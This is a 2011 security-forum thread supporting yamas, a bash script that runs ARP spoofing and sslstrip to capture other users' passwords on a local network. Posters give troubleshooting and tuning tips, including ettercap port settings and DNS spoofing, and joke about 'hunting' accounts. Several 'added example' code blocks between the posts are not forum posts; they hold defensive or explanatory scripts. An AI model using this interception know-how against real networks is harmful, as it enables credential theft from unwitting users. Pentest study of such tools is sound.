Oops, I misunderstood you. Well, that is possible but it would require saving a pcap file and running etter-something to parse cookies, and that's not really where I'm headed. Maybe I could add an option to use ettercap instead of my parsing, but that would defeat hours of work trying to achieve that all by myself (and that was one hell of a work !), so my ego wouldn't like that very much (yup, I'm French :p ).

Seriously, I'll give it a try, it could be handy ;)

Nucci
06-14-2011, 10:43 PM
Hi, your script works almost perfect. I do have 1 major issue though. Whenever I am using it, the attacked machines will not reach any webpage in first attempt (Throws error 303 on Macs). Refreshing the page will, however, load it perfectly normal. I've tried to track down the problem, and I think it is something with sslstrip, but I am not completely sure

comaX
06-16-2011, 03:14 PM
Hi, your script works almost perfect. I do have 1 major issue though. Whenever I am using it, the attacked machines will not reach any webpage in first attempt (Throws error 303 on Macs). Refreshing the page will, however, load it perfectly normal. I've tried to track down the problem, and I think it is something with sslstrip, but I am not completely sure

Happens from time to time for me too... But the script is not at fault here, so there's not much I can do to help ! Have you tried doing the attack manually to check if it does the same thing ? I believe it will, but it's worth giving it a shot !

Binx_23
06-20-2011, 12:20 AM
Hi, your script works almost perfect. I do have 1 major issue though. Whenever I am using it, the attacked machines will not reach any webpage in first attempt (Throws error 303 on Macs). Refreshing the page will, however, load it perfectly normal. I've tried to track down the problem, and I think it is something with sslstrip, but I am not completely sure

Yep, I have the same problem, it's an sslstrip issue though.. And it's from the 0.9 version, cause versions < 0.9 don't have that bug, anyway, speed improvements and other bugs have been fixed in 0.9, so I'd recommend you stick to this version and wait for Moxie to fix it. How's that update going ComaX? :)

comaX
06-22-2011, 07:50 PM
Yep, I have the same problem, it's an sslstrip issue though.. And it's from the 0.9 version, cause versions < 0.9 don't have that bug, anyway, speed improvements and other bugs have been fixed in 0.9, so I'd recommend you stick to this version and wait for Moxie to fix it. How's that update going ComaX? :)

I didn't have much time those last days between parties, lack of sleep, my work on Maemo's version of yamas, lack of sleep, real work, and some more lack of sleep :p. But we're getting close to an end on the handheld version, so I'll get back on track with this one to provide new features as soon as I can !
I'll keep you guys posted !

And since there isn't as much feedback as before, I suppose people are pretty much satisfied with the current version, so I don't *need* to do much right now. Only new features that can wait !

NightDream
07-10-2011, 06:42 PM
Hello!
Some months ago I downloaded and installed v0.9 and was working very well.
But today I forgot I had it installed so I copied the source to a new .sh file and executed:


./yamas.sh
You are running version 0.9, do you want to update to 0.9.1? (Y/N)
y
[+] Updating script...
[-] Script updated !
Do you want to install it so that you can launch it with "mitm" ?
n
Ok, continuing with updated version...
./yamas.sh: ./yamas.sh: /bin/bash^M: bad interpreter: No such file or directory


I tried to download the .sh from your direct link and execute it and got the same error. By now, if I try to execute "mitm" I also get this:


bash: ./yamas.sh: /bin/bash^M: bad interpreter: No such file or directory

Little bit lost with it, cause it worked very well and now.. I'm using Bt5, and also was using the same Bt5 installation on the older script version.

Any idea?
Thanks in advance

zimmaro
07-12-2011, 07:22 PM
hi
i've the same problem:confused:

zimmaro
07-12-2011, 07:52 PM
hi
my rapid"safe and intuitive solution" is:
-delete mitm in /usr/bin/
-go-to "website yamas" http://comax.pagesperso-orange.fr/info/mitm/ # axzz1RvCYNlVa
-Copy & Paste the-vers 0.9 with (kate, gedit, Geany ....)
-Save "name".sh in /root directory
-open terminal> sh "name".sh> NO! upgrade to 0.91> NO install
I'm working so waiting for the official solution! I take this opportunity to thank once again Comax
bye :)

ericmilam
07-12-2011, 07:55 PM
All you need to do is run dos2unix from the command prompt in BT. It should be fine after that.

zimmaro
07-12-2011, 08:44 PM
hi, ericmilam
many thanks, I was not aware of dos2unix, now works!:)
I always thought to be a goat !!!:):)

ericmilam
07-12-2011, 08:52 PM
No problem.

Whenever you see that error...that's all you should have to do...

DOS & RTF type documents append a bunch of hidden items.
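The `/bin/bash^M: bad interpreter` message in the posts above is the kernel looking for an interpreter literally named `/bin/bash` followed by a carriage return, which is what a CRLF line ending leaves at the end of the shebang. As an added example (not part of the thread and not from yamas), the functions below detect that condition and strip it with only `grep` and `sed`, for machines where dos2unix is not installed; the sample script they operate on is constructed here.

```bash
#!/bin/bash
# Added example: detect and strip CRLF (DOS) line endings from a shell script.
# The helper names and the sample script are constructed for this demonstration.

CR=$(printf '\r')   # a literal carriage-return character

# has_crlf FILE -> exit 0 if any line of FILE ends in CR LF, 1 otherwise.
# A CR after the shebang is what makes the kernel report "/bin/bash^M: bad interpreter".
has_crlf() {
    grep -q "${CR}\$" "$1"
}

# show_shebang FILE -> prints the first line with control characters made visible,
# so the trailing \r shows up instead of hiding behind "^M" in the error message.
show_shebang() {
    head -n 1 "$1" | od -An -c | tr -s ' ' | sed 's/^ //'
}

# strip_crlf FILE -> rewrites FILE in place with trailing CRs removed.
# Writes to a temp file first so a failure half-way leaves the original untouched.
strip_crlf() {
    tmp="$1.tmp.$$"
    sed "s/${CR}\$//" "$1" > "$tmp" && mv "$tmp" "$1"
}

# make_dos_script FILE -> writes a tiny script with CRLF endings, the way a
# Windows editor saves it (constructed sample input).
make_dos_script() {
    printf '#!/bin/bash\r\necho hi\r\n' > "$1"
}

# demo -> shows the shebang before and after the fix and runs the repaired script.
demo() {
    f=$(mktemp)
    make_dos_script "$f"
    echo "before: $(show_shebang "$f")"
    has_crlf "$f" && echo "CRLF endings detected, stripping"
    strip_crlf "$f"
    echo "after:  $(show_shebang "$f")"
    sh "$f"
    rm -f "$f"
}

demo
```

The same symptom appears for any script edited on Windows or pasted through a word processor, so `has_crlf` is a cheap check to run before installing a downloaded script into `/usr/bin`.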

comaX
07-13-2011, 06:40 PM
All you need to do is run dos2unix from the command prompt in BT. It should be fine after that.
Thanks for the help ! That's weird though, I'll look into that.

In next version 0.9.2 or maybe 0.9.3 (kinda lost track to be honest... I know I have a 0.9.2 in my files, but don't know if this was test or new stuff :s) I'll add an option so that the script doesn't check for updates, and hopefully soon enough, DNS spoofing. But I don't have much time these days, so I'll do what I can ^^

Cheers !

ericmilam
07-13-2011, 06:54 PM
Thanks for the help ! That's weird though, I'll look into that.

Are you doing your work in Windows Word Pad or Mac's Text Edit? If so that'll do it.

With regards to losing track. I totally understand...seems I lose steam as well.

Best Regards,
Eric

comaX
07-14-2011, 09:13 AM
Are you doing your work in Windows Word Pad or Mac's Text Edit? If so that'll do it.

With regards to losing track. I totally understand...seems I lose steam as well.

Best Regards,
Eric

When I have some quick edit to do, I sometimes use Kedit in win7 but so far there never was a problem... Don't know what happened ! Anyway, that's now fixed. I also added an argument (-n) so that the script doesn't check for updates at startup. That was requested by mail, and I can understand why one wouldn't want to update or even check for them. Since it was quick and easy, I just did it !

ericmilam
07-14-2011, 04:13 PM
That was requested by mail, and I can understand why one wouldn't want to update or even check for them. Since it was quick and easy, I just did it !

Funny how what we, as the code writer, think is important versus the feedback from the users. I always find it odd. I always thought the sslstrip parser would knock people's socks off, but they don't seem to care. Weird to me...probably because it saved me hours and hours of going through sslstrip dumps for accounts...

Oh well!

Happy hunting....

comaX
07-15-2011, 12:03 PM
Ahah, that's true !

By the way, my new website is up and running (and not finished at all, but who gives a f...). So the script is updated too so that it retrieves informations from the new website !

Update your scripts !
Oh, and you will now have to launch it with "yamas" instead of "mitm" !

killadaninja
07-15-2011, 05:36 PM
Grepping and parsing data to/from a dynamic file using sh, NOT A GREAT IDEA but it can be done. I'll have a look into it.

michelinok
07-15-2011, 05:53 PM
Still here?

http://comax.pagesperso-orange.fr/mitm.sh

or changed?

comaX
07-15-2011, 06:04 PM
Still there, but migrating to comax.fr. Don't worry, the script should do that alone, you won't notice anything. You'll just have to call it with "yamas" instead of "mitm" ;)

Killadaninja : yup, but since it was a bash script, I did it with bash, and I must say I'm pretty happy with the result. I just have to find a way to not make it parse the whole stuff every time, because when the file gets large, it gets CPU consuming... Tail could be an option, but I remember I discarded it for some reason when I was working on it !

killadaninja
07-16-2011, 06:19 AM
Excuse my ignorance ComaX, I did not realise you had incorporated it into your script, I thought you were having a problem doing so, hence why I said I would have a look. So what exactly is your problem?

michelinok
07-16-2011, 07:02 AM
No way to have ettercap (as an option of course!!!) to parse the traffic?

NightDream
07-17-2011, 11:14 AM
I deleted mitm in /usr/bin and download again the recent yamas.sh
Now working fine

Thanks for the script!

cheers

comaX
07-17-2011, 07:35 PM
Excuse my ignorance ComaX, I did not realise you had incorporated it into your script, I thought you were having a problem doing so, hence why I said I would have a look. So what exactly is your problem?

Hmm well, right now I don't think I have any ! I did have problems, but I believe I solved them all ! If I could, I would just like to make it less CPU-consuming ! Thanks for your interest though ;)

@Michelinok : I don't know how this works, but I'm pretty sure it will need a pcap file. And that would defeat the sole purpose of the parser I worked my as* off to do :p
I'll have a look into it though. After all, my parser is for sslstrip, not for pcap, so why not...

ericmilam
07-18-2011, 09:13 PM
I created a more "fluid" way to check for sslstrip version. I notice you hardcoded your version numbers.

this may help...works ok for now and should in the future as well.

http://pastebin.com/j8qJ6LQt

JB

comaX
07-19-2011, 10:08 AM
Pretty nice, but that is pretty much hard-coded too :

printf "\nDownloading the tar file...\n"
cd /tmp
wget -q http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
sleep 2

The link is provided on the page so, parsing it to store it to a variable and then wget -q $var would do the trick ;)

ericmilam
07-19-2011, 04:22 PM
Doh! I totally missed that one. Thanks for the heads up. Can fix it like this: wget -q http://www.thoughtcrime.org/software/sslstrip/sslstrip-$latestver.tar.gz

Hopefully he always saves it as a .tar.gz file...

Thanks
JB

comaX
07-20-2011, 11:04 AM
I think he does, since at least 0.6 if I remember correctly !

Taurin
07-25-2011, 10:11 AM
Hi comaX,

I'm using BT5 (KDE32, installed) and have tried several things to get MITM Scripts running. Without using SSLstrip ettercap works fine for me, but my attempts to capture HTTPS traffic mainly failed. I've tested yamas and must say, that it seems to work properly. Thanks for your great work.

But I've discovered some problems, too. While surfing on social networks (like fb) the pass window keeps on repeating website, login (the id-nr.) and wrong captured entries as passwords. When I tried to select one, or two victims, the whole network was still logged. While three machines were running, yamas crashed often around ~30 minutes of usage. I've got colored stripes on the screen and couldn't see anything till hard-reboot. E-Mail clients were not logged, also several pages (like this board) were not detected properly. "Location: ht" seems to be a kind of ssltrip-bug, which sucks while surfing. ettercap worked fine for showing up captured details, maybe you could integrate an option to choose ettercap instead.

What I liked the most about yamas, is the cleaning function at the beginning and out of that it's always running (stable) the same way and these security alerts never showed up, because sslstrip seems to run correctly.

Kind regards

comaX
07-29-2011, 06:14 PM
Hi ! Thanks for the feedback (nice avatar btw =D )! I never experienced anything like you say, unfortunately, so I don't really know what to do there...
Location: ht is indeed an sslstrip error, nothing I can do about that ! Did you use yamas -e or just yamas ?

By the way, I did a little "article" about how to mitigate that kind of attack. Nothing too fancy or too savvy, but it's a good start I think. You can check it out at http://comax.fr/yamas.php?frame=protect.php and then click the "how to protect yourself" link !

Cheers !
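comaX's post points at his article on mitigating the attack. Detection is the other half of that, so here is an added example (mine, not from the thread and not from yamas) that reads the kernel's neighbour table for the two symptoms a defender can see from any host on the LAN: one MAC address claiming several IP addresses, and the gateway's MAC no longer matching the value recorded on a clean network. The `ip neigh show` lines, the gateway address 192.168.0.254 and the known-good MAC are constructed values.

```bash
#!/bin/sh
# Added example: spot ARP-spoofing symptoms in the kernel neighbour table.
# The sample table and the "known-good" gateway MAC are constructed values.

# Constructed "ip neigh show" output. On the clean network the gateway .254 had
# 00:11:22:33:44:55; here it has been overwritten with the MAC of host .102.
SAMPLE_NEIGH='192.168.0.254 dev wlan0 lladdr aa:bb:cc:dd:ee:01 REACHABLE
192.168.0.102 dev wlan0 lladdr aa:bb:cc:dd:ee:01 STALE
192.168.0.17 dev wlan0 lladdr aa:bb:cc:dd:ee:02 REACHABLE
192.168.0.33 dev wlan0 FAILED'

# macs_with_multiple_ips < neigh-table -> one line per MAC bound to more than one IP:
# "MAC ip1 ip2 ...". Entries without an lladdr (FAILED/INCOMPLETE) are ignored.
# A single NIC answering for the gateway and for a host is the classic poisoning symptom.
macs_with_multiple_ips() {
    awk '$4 == "lladdr" { ips[$5] = ips[$5] " " $1; n[$5]++ }
         END { for (m in n) if (n[m] > 1) print m ips[m] }' | sort
}

# gateway_mac GATEWAY_IP < neigh-table -> the MAC currently recorded for the gateway.
gateway_mac() {
    awk -v gw="$1" '$1 == gw && $4 == "lladdr" { print $5; exit }'
}

# check_gateway GATEWAY_IP EXPECTED_MAC < neigh-table -> exit 0 if the gateway still
# has the MAC recorded on a clean network, 1 if it changed or is missing.
check_gateway() {
    current=$(gateway_mac "$1")
    [ -n "$current" ] && [ "$current" = "$2" ]
}

# Stand-alone demo against the constructed table.
printf '%s\n' "$SAMPLE_NEIGH" | macs_with_multiple_ips
if printf '%s\n' "$SAMPLE_NEIGH" | check_gateway 192.168.0.254 00:11:22:33:44:55; then
    echo "gateway MAC unchanged"
else
    echo "gateway MAC changed: now $(printf '%s\n' "$SAMPLE_NEIGH" | gateway_mac 192.168.0.254)"
fi
```

On a live host pipe `ip neigh show` into the functions and keep the clean-network gateway MAC somewhere the script can read it. A MAC shared by two IPs can be legitimate (a router holding several addresses, VRRP, a host bridging VMs), so the output is something to investigate rather than proof on its own; arpwatch and a static ARP entry for the gateway are the usual follow-ups.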

ericmilam
07-29-2011, 07:59 PM
@Taurin - You have to remember that if SSLStrip intercepts the traffic, it is no longer 443 traffic, so you will not see it in ettercap. In addition, all port 80 traffic forwards to 10000 in SSLStrip, so again ettercap won't see it. So it is working as expected, you WON'T see it in ettercap and will have to go through the SSLStrip Logs.

One thing you may be able to do is to add port 10000 to the etter.conf file as http traffic. Then you may begin seeing the traffic in ettercap. I believe that would work, but haven't tested it.

Happy hunting...

snafu777
07-31-2011, 04:49 PM
comaX,

Okay, here is the edit I told you about. Anywhere you see a *** will indicate changes and such


comaX,
Hello there... I've some ideas for your script that ye might include. Some of the ideas are from my own current scripts that I use for day to day testing and some of them are based off things I've seen in your 'bashing'. I must say, I like some of what you've done with your 'bashing' (So many different ways to do the same thing, whatever is more efficient is the way to go, so I've been taught and believe and teach back) so I'll be incorporating that style into my own script. Now, that is of course if it's okay with you Sir. I shall give credit where it's due if you would allow me.

Let's tear into this thing shall we?

Tabbing...It's what makes a script really readable to the end user. As well, it's incorporated into python (<3 the snake)....
Take for instance this part of your fast_cleanup function:

if [[ "$1" = "-e" || "$1" = "--etter" ]]; then
killall ettercap
else
killall arpspoof
fi

We can make it more readable via this (As well, if you ever choose to port it to python or another "tab" required language, some of the work is already done for ya):

if [[ "$1" = "-e" || "$1" = "--etter" ]]; then
  killall ettercap
else
  killall arpspoof
fi

I used a standard two spaces with the indent....I can't use tab here without editing in a word doc....Use whatever method suits ya =)
Every character counts
if [[ "$1" = "-p" || "$1" = "--parse" ]]; then #parse a given filename

You could change that up a bit and have less characters via:

if [ $1 = "-p" -o $1 = "--parse" ]; then #parse a given filename

since $1 would only be -p or --parse, there is no need to quote it (i.e. There are no spaces within the value of $1; preventing any need for quotations)
My rhyme and reasoning aside from the conservation of total characters within the script ---> To Double Bracket, or Not to Double Bracket. That is the Question We Must Ask Ourselves (http://tldp.org/LDP/abs/html/abs-guide.html#DBLBRACKETS)


***Mistake 1*** I was writing some script just two days ago, and I came across an issue, something about unary operator expected. So I did the right thing, I researched.... Turns out the quotes aren't a bad idea after all. I can't explain it nearly as well as the webpage does so here is the link explaining why I was wrong, and you were right regarding quote usage http://linuxcommand.org/wss0100.php As well, your use of double brackets might not be too bad of an idea either....while my script example I don't have with me, I know that to implore a quick fix, I did the double bracket around the test (figured maybe you had the right idea with the double brackets....and yep........it prevented the unary error. I am wondering though if by doing quotes I could have prevented it....That might be confusing....and since I can't write script and test right now (windows box)...Here is my example to test the [[ and "" thing
#!/bin/bash

number=

if [[ $number = "1" ]]; then
echo "Number equals 1"
else
echo "Number does not equal 1"
fi

Their solution was to enclose $number within quotes...."$number" ....My guess was to enclose it in brackets like I did in the above example. I will test this as soon as I get home and report back. I'm betting that by running the above script, you don't get any errors....We shall see..

Outside of the LAN Issues
This one is a stretch....but...I cannot stress this enough......Any PenTester worth his salt must "Think Outside the Box"
### Message of the day ! <= ****ing useless, but who knows, I might want to warn about something directly, or tell a joke...
wget -q http://comax.fr/yamas/bt5/message -O /tmp/message
message=$(cat /tmp/message) #store it to variable
rm /tmp/message #remove temp message file

If I used your script in a corporate environment, it would draw unneeded attention (i.e. You're doing a PenTest on a big corporation and they see that some user is connecting <or trying to connect> to a "non-whitelisted" IP/HTTP/Whatever connection, it might get logged, and then alert them to your presence.) IMHO, remove any unneeded connections to the outside world from your script comaX. As far as the lines of script that "MUST" communicate with the outside world, i.e. grepcred.txt.....throw in an option that allows the user to choose whether or not they wish to send packets outside of the LAN, don't do it for them. At a minimum, throw in the option that if they don't specify for instance $2 regarding the grepcred --parse option....Or AutoUpdating...That type of thing....that there will be a pause prior to the grabbing of the file (thereby allowing them to stop the script, lest it connect)....

Menu Options
rtparse() {
echo -e "\n\nIn this menu, you can pause, resume, kill, or launch
realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
read rtp
if [ "$rtp" = "1" ] ; then
echo -e "\033[33m[+]Pausing...\033[m"
kill -19 ${looparseid}
echo -e "\033[33m[-]Paused.\033[m"
rtparse
elif [ "$rtp" = "2" ] ; then
echo -e "\033[33m[+]Resuming...\033[m"
kill -18 ${looparseid}
echo -e "\033[33m[-]Resumed.\033[m"
rtparse
elif [ "$rtp" = "3" ] ; then
echo -e "\033[31m[+]Killing...\033[m"
kill ${looparseid}
echo -e "\033[33m[-]Killed.\033[m"
rtparse
elif [ "$rtp" = "4" ] ; then
echo -e "\033[32m[+]Launching...\033[m"
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh &
looparseid=$!
sleep 2
echo -e "\033[33m[-]Launched.\033[m"
rtparse
elif [ "$rtp" = "5" ] ; then
echo "Previous"
final
else echo -e "\033[31mBad choice bro !\033[m\n" #was "mother****er" during my tests.
rtparse
fi
}

Let's clean this up via case:

***I changed this to actually work...My statements were incorrect in the previous version of this post***
rtparse() {
echo -e "\n\nIn this menu, you can pause, resume, kill, or launch
realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
read rtp
case $rtp in # not sure if this should be quote enclosed...anyone want to help out? It's singular options without a space, so I think the need for quotes is NOT needed??
1) echo -e "\033[33m[+]Pausing...\033[m"
kill -19 ${looparseid}
echo -e "\033[33m[-]Paused.\033[m"
rtparse;;
2) echo -e "\033[33m[+]Resuming...\033[m"
kill -18 ${looparseid}
echo -e "\033[33m[-]Resumed.\033[m"
rtparse;;
3) echo -e "\033[31m[+]Killing...\033[m"
kill ${looparseid}
echo -e "\033[33m[-]Killed.\033[m"
rtparse;;
4) echo -e "\033[32m[+]Launching...\033[m"
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh &
looparseid=$!
sleep 2
echo -e "\033[33m[-]Launched.\033[m"
rtparse;;
5) echo "Previous"
final
else echo -e "\033[31mBad choice bro !\033[m\n" #Professional Language =)
rtparse;;
esac
}

***Mistake 2***
Change from 5) down to read

5) echo "Previous"
final;; ## must have the ;; to go to the next statement, not sure if statement is the word, but u know what i mean......
*) echo -e "\033[31mBad choice bro !\033[m\n" #Professional Language =) ## the * indicates your else part of the if statement..ie...choices are 1-5...anything that is not equal to 1 - 5....invokes the else
rtparse;;
esac
}



Learning Curve
As I stated above, I have seen some neat things in your script that I want to incorporate into my own.

1) I am posting from a windows box right now, so I can't experiment and figure it out on my own (yes google...but...Believe it or not, there are a lot of websites I'm blocked from where I am currently at..The websites where I could learn certain syntax usage specifically....Amazingly enuf...this website isn't blocked....blows my mind, but whatever....It allows me to contribute and learn just by being here....)

2) I think I know what they do by looking at them, and would like you to clarify for me, Please... =)
I took these snippets from the original code for the topic directly above this one, for ease of use, I will not use my modified case here....Leaving your original code intact...
if [ "$rtp" = "1" ] ; then
echo -e "\033[33m[+]Pausing...\033[m"
kill -19 ${looparseid}
echo -e "\033[33m[-]Paused.\033[m"
rtparse
elif [ "$rtp" = "2" ] ; then
echo -e "\033[33m[+]Resuming...\033[m"
kill -18 ${looparseid}

Question 1) Why enclose $loopparseid inside curly braces? What function, if any does that serve?
Question 2) kill -19 and kill -18. Does that pause and resume ANY program?? If so, wow...Just learned something EXTREMELY useful....
Alright, welp...That about wraps that. There are some other things I noticed, but I will see if I get any response to my above ideas. Take a look at it, and if you like what I did and are hungry for more, let me know. Always happy to help.


V/r,
Snafu
Pffbt..
I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass..
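The open question in the post above (does quoting `$number`, or switching to `[[ ]]`, avoid "unary operator expected"?) and the later question about `${var}` braces are both settled by running the forms side by side. This is an added example, not code from the thread or from yamas; the helper names are mine. Each helper prints the exit status of the test command itself, which is what separates a false comparison (1) from a malformed one (2).

```bash
#!/bin/bash
# Added example: how [ ], quoting and [[ ]] behave when the variable is empty
# or contains a space. Helper names are constructed for this demonstration.

# Each helper runs one form of the comparison against "$1" and prints the exit
# status of the test itself: 0 = true, 1 = false, 2 = the test was malformed
# (the "unary operator expected" / "too many arguments" case).

# Unquoted variable inside [ ]: an empty value makes the test see "[ = 1 ]",
# a value with a space makes it see "[ a b = 1 ]".
test_unquoted_single() {
    rc=0
    # shellcheck disable=SC2086
    [ $1 = "1" ] 2>/dev/null || rc=$?
    echo "$rc"
}

# Quoted variable inside [ ]: the value is always exactly one word.
test_quoted_single() {
    rc=0
    [ "$1" = "1" ] || rc=$?
    echo "$rc"
}

# [[ ]] is shell syntax, not a command: no word splitting happens inside it,
# so quoting the left-hand side is optional (quoting the right-hand side still
# matters, because an unquoted RHS is treated as a pattern). bash-only.
test_double_bracket() {
    rc=0
    [[ $1 = "1" ]] || rc=$?
    echo "$rc"
}

# Braces are only needed when the name is immediately followed by a character
# that could be part of a name: "$prefixfile" is the (empty) variable
# "prefixfile", while "${prefix}file" is "log" followed by "file".
brace_demo() {
    prefix=log
    echo "${prefix}file|$prefixfile"
}

# "case" does not word-split the word it matches, so "case $rtp in" is safe
# even when $rtp is empty; this helper reports which branch an input takes.
menu_choice() {
    case $1 in
        1) echo pause ;;
        2) echo resume ;;
        *) echo invalid ;;
    esac
}

# Stand-alone demo: one row per input value.
for v in "" "1" "a b"; do
    printf '%-6s unquoted=%s quoted=%s double=%s\n' "'$v'" \
        "$(test_unquoted_single "$v")" "$(test_quoted_single "$v")" \
        "$(test_double_bracket "$v")"
done
brace_demo
menu_choice ""
```

The short version: inside `[ ]` an unquoted empty variable disappears, so `[ $1 = "1" ]` becomes `[ = 1 ]` and the test is malformed; quoting makes it `[ "" = "1" ]`, an ordinary false comparison. `[[ ]]` is parsed by the shell rather than run as a command, so the unquoted form is safe there, at the cost of being bash-only.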

comaX
08-03-2011, 03:17 PM
Yay ! Thank you very much !

So, I'll try not to forget anything, tell me if I do ;)

Tabbing. You sir are very right. I try to do that, but sometimes I just get lost and give that up as long as it does what I want. I should really take the time to clean it up though.

Chars count : again, you're right, but since there are comments everywhere and all, I didn't pay much attention to that. As for the double brackets, I used to use only one but it gave me some bugs at some places, so I decided every if statement would have double brackets and quotes. That's not very serious, but I learnt scripting as I scripted so I didn't bother much as long as it worked. Now that I know a bit more, I should include that in a clean up, sure.

Outside of the lan. I updated the script two days ago with a new -s switch (for silent) to prevent the script from requesting anything. Too bad I didn't see your post earlier ! By the way, one should have the needed files before launching the script then. And, it makes me think I might have forgotten something. Damn. Edit : I did forget something. It's now fixed !

Menu options. I used case but for some reason removed them? I can't remember why. If the posted version works, I'll cook a good copypasta though ! Thanks :) Edit : works with that, but you forgot to put *) for the last case.

rtparse() {
echo -e "\n\nIn this menu, you can pause, resume, kill, or launch
realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
read rtp
case $rtp in # not sure if this should be quote enclosed...anyone want to help out? It's singular options without a space, so I think the need for quotes is NOT needed??
1) echo -e "\033[33m[+]Pausing...\033[m"
kill -19 ${looparseid}
echo -e "\033[33m[-]Paused.\033[m"
rtparse;;
2) echo -e "\033[33m[+]Resuming...\033[m"
kill -18 ${looparseid}
echo -e "\033[33m[-]Resumed.\033[m"
rtparse;;
3) echo -e "\033[31m[+]Killing...\033[m"
kill ${looparseid}
echo -e "\033[33m[-]Killed.\033[m"
rtparse;;
4) echo -e "\033[32m[+]Launching...\033[m"
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh &
looparseid=$!
sleep 2
echo -e "\033[33m[-]Launched.\033[m"
rtparse;;
5) echo "Previous"
final ;;
*) echo -e "\033[31mBad choice bro !\033[m\n" #Professional Language =)
rtparse;;
esac
}

/Edit

"Stealing" my work ? :p Please do as you please good sir ! You're even welcome to do so, it's an honour !

Regarding question 1 : this was something I found in someone else's script when I didn't know anything about that. I now feel very dumb for not asking myself this question... Best way to get an answer is to try it ! So that's what I'll do ! Edit : just tried, they were useless.

Question 2 : I believe it does. If I remember the man pages for kill, it stated that it suspended a process execution. I'll edit with the relevant part of the man when I find it.

Thank you very much for such a feedback, that's exactly what I need, want and like ! If you have more, please do report !
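To confirm the answer to question 2: `kill -19` and `kill -18` send SIGSTOP and SIGCONT on x86 Linux, and SIGSTOP cannot be caught, blocked or ignored, so it pauses any process regardless of what it is doing. The example below is added here (not from the thread and not from yamas) and uses the signal names, since the numbers differ between architectures; the background worker and the helper names are constructed.

```bash
#!/bin/bash
# Added example: pausing and resuming a process with SIGSTOP/SIGCONT, which is
# what "kill -19" / "kill -18" do on x86 Linux. Helper names are constructed.

# proc_state PID -> prints the one-letter scheduler state of PID
# (T = stopped, S = sleeping, R = running, Z = zombie), read from /proc when
# available and from ps otherwise.
proc_state() {
    if [ -r "/proc/$1/stat" ]; then
        # /proc/PID/stat is "PID (comm) STATE ..."; drop everything up to ") "
        sed 's/.*) //' "/proc/$1/stat" | cut -d' ' -f1
    else
        ps -o stat= -p "$1" | cut -c1
    fi
}

# stop_and_resume -> starts a background worker, stops it, resumes it and prints
# the state seen after each signal as "STOPPED RESUMED" (expected "T S").
stop_and_resume() {
    sleep 30 &
    pid=$!
    kill -STOP "$pid"           # signal names are portable; numbers vary per arch
    sleep 1
    stopped=$(proc_state "$pid")
    kill -CONT "$pid"
    sleep 1
    resumed=$(proc_state "$pid")
    kill "$pid"                 # SIGTERM: clean up the worker
    wait "$pid" 2>/dev/null || true
    echo "$stopped $resumed"
}

stop_and_resume
```

This is exactly what the `rtparse` menu above does to the xterm running the parser: option 1 freezes it in place so its output can be read, option 2 lets it continue. Note that a SIGTERM sent to a stopped process is queued rather than acted on until the process is continued, which is why the example sends SIGCONT before the final `kill`.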

th3hate
08-10-2011, 03:43 PM
Is it possible to run this script in bt5 vmware? To my information vmware doesn't recognize wlan0 unless using an external wifi card.

Using bridged mode only captures stuff from the pc you're working on.

2WIRE057
08-12-2011, 08:55 PM
Is it possible to run this script in bt5 vmware? To my information vmware doesn't recognize wlan0 unless using an external wifi card.

Using bridged mode only captures stuff from the pc you're working on.

Yes. You must be using a USB wifi adapter.

comaX
08-13-2011, 09:24 AM
That sounds about right ! So just plug a USB adapter, connect it to the VMware, and I think it will be ok !

comaX
08-25-2011, 11:00 PM
Hi guys ! I added DNS spoofing, and even though I think I didn't make any mistake since it works, it's very buggy and will work one time in four...
So, any help would be appreciated ! If you think it's better to start a new thread, I'll do !

Meanwhile, you can grab the last version there : http://comax.fr/yamas.php

Btw, a friend from maemo's forums did a very good demo video, you should check it out !

ericmilam
08-25-2011, 11:06 PM
Have you checked SSLStrip since the BT5r1 update? It's not playing nice with ettercap and I wanted to see if your script is ok. I get nothing but L3 errors when SSLStrip is fired up with ettercap. I haven't narrowed it down, but everything was cool in BT5, only the kernel changed.

Best Regards,
JB

comaX
08-25-2011, 11:43 PM
Have you checked SSLStrip since the BT5r1 update? It's not playing nice with ettercap and I wanted to see if your script is ok. I get nothing but L3 errors when SSLStrip is fired up with ettercap. I haven't narrowed it down, but everything was cool in BT5, only the kernel changed.

Best Regards,
JB

Nope, I only tried with arpspoof, and everything's alright ! I'll try with ettercap and report back.

Any idea regarding dns spoofing issues ? I'm using dnsspoof by the way.

Cheers !

Carnacior
08-26-2011, 05:02 AM
+1 for the L3 errors with SSLstrip...

comaX
08-26-2011, 11:34 AM
After a quick try on different sites, I didn't get any error. I believe to be fully up to date since I updated just a few days ago with

apt-get update
apt-get upgrade
apt-get dist-upgrade

I didn't get 5r1 from the image, as you understood.

Edit : I just tried all those commands again, and I was indeed fully up to date !

Edit 2 : DNS spoofing with ettercap seems steadier than with dnsspoof. Both are available from the script though. Waiting for some feedback ;)

Julius
08-31-2011, 12:47 AM
Hello, very very very many thanks for your project. I see this one with more options : http://code.google.com/p/easy-creds/ and Mod Edit: No links which require registration. Can you include more options in your future release please :-)


thanks a lot

tuxnator
09-09-2011, 07:55 PM
Hi comaX,

Firstly, I would like to congratulate you for the very good work with this script. :D

Secondly, and if you allow me to say so, until version 0.9 there is no need to use wget in this script. The idea of self-update doesn't sound good. You should use a repository instead. However, worse is the idea of downloading and injecting code into the script on the fly. This is a great security flaw. :rolleyes:

Concluding, try to use the function feature more; it'll make your code clearer, less repetitive, easier and safer to maintain.

VulpiArgenti
09-11-2011, 05:32 AM
Hi comaX,

You might be pleased to know there is someone out here using your script to learn bash. The heavy commenting is very helpful.

I notice a small problem running nmap. On my set-up, I get these results:


root@bt:~# ip route show
default via 192.168.0.254 dev wlan0
